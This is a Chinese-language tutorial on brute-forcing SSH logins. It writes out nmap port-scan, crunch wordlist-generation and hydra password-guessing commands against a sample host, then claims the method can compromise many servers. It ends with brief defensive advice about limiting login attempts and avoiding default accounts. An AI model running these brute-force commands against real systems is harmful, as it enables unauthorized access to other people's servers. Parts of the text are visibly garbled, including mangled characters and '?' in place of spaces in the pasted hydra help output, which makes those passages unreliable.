聲明：謝絕一切形式的轉(zhuǎn)載，禁止用作非法目的。

工具

nmap和hydra(Kali Linux自帶) nmap 是掃描工具 hydra 暴力破解工具

第一步 掃描

nmap在網(wǎng)絡(luò)掃描，漏洞發(fā)現(xiàn)等收集信息方面有舉足輕重的地位。后續(xù)會專門講解nmap的使用，這個工具讓我對網(wǎng)絡(luò)有了更進一步的認(rèn)識。 這里進行最簡單的掃描，查看被攻擊的機器開放的端口。 nmap 192.168.1.103

從上圖中可以看出ssh是開啟的。

第二部 暴力破解

暴力破解，自然離不開字典文件，如何生成字典，網(wǎng)上有很多的工具，當(dāng)然也可以利用kali自帶的字典。

生成字典

在Linux下，使用比較多的是crunch。crunch是一種創(chuàng)建密碼字典工具，該字典通常用于暴力破解。使用Crunch工具生成的密碼可以發(fā)送到終端、文件或另一個程序。

1. crunch [minimum length] [maximum length] [character set] [options]

生成密碼列表的最小長度為4，最大長度為6，并使用0123456789為字符集，可通過下面的命令生成字典文件：

1. crunch 4 6 0123456789 -o passwd.txt

破解ssh

使用下面的命令就可以對開啟ssh服務(wù)的機器進行攻擊，這種攻擊足矣讓很多服務(wù)器淪陷?？筛鶕?jù)需要將相應(yīng)的用戶名、密碼改為相應(yīng)的字典文件。

1. hydra -l burning -p 123456 -s 22 192.168.1.103 ssh

hydra使用的參數(shù):

1. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

2. 
   

3. Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]

4. 
   

5. Options:

6. ?-l LOGIN or -L FILE ?login with LOGIN name, or load several logins from FILE

7. ?-p PASS ?or -P FILE ?try password PASS, or load several passwords from FILE

8. ?-C FILE ? colon separated "login:pass" format, instead of -L/-P options

9. ?-M FILE ? list of servers to attack, one entry per line, ':' to specify port

10. ?-t TASKS ?run TASKS number of connects in parallel per target (default: 16)

11. ?-U ? ? ? ?service module usage details

12. ?-h ? ? ? ?more command line options (COMPLETE HELP)

13. ?server ? ?the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)

14. ?service ? the service to crack (see below for supported protocols)

15. ?OPT ? ? ? some service modules support additional input (-U for module help)

攻擊成功后的效果如下所示，這證明帳號密碼都是正確的。

SSH

SSH 為 Secure Shell 的縮寫，由 IETF 的網(wǎng)絡(luò)小組（Network Working Group）所制定；SSH 為建立在應(yīng)用層基礎(chǔ)上的安全協(xié)議。SSH 是較可靠，專為遠(yuǎn)程登錄會話和其他網(wǎng)絡(luò)服務(wù)提供安全性的協(xié)議。利用 SSH 協(xié)議可以有效防止遠(yuǎn)程管理過程中的信息泄露問題。SSH最初是UNIX系統(tǒng)上的一個程序，后來又迅速擴展到其他操作平臺。SSH在正確使用時可彌補網(wǎng)絡(luò)中的漏洞。SSH客戶端適用于多種平臺。幾乎所有UNIX平臺—包括HP-UX、Linux、AIX、Solaris、Digital UNIX、Irix，以及其他平臺，都可運行SSH。

寫在最后

對于網(wǎng)站的ssh服務(wù)，需要謹(jǐn)慎開啟。雖然方便了遠(yuǎn)程工作，但是也為黑客破解網(wǎng)站提供了一個很好的入口，有很多的網(wǎng)站，ssh使用默認(rèn)的賬戶名，那破解難度又下降了一個級別。因此，如果一定要開啟服務(wù)，帳號密碼要合理設(shè)置。

原則上，只要有足夠大的硬盤空間，就能夠破解任意的帳號密碼。所以，有必要對用戶登陸次數(shù)進行限制。

公眾號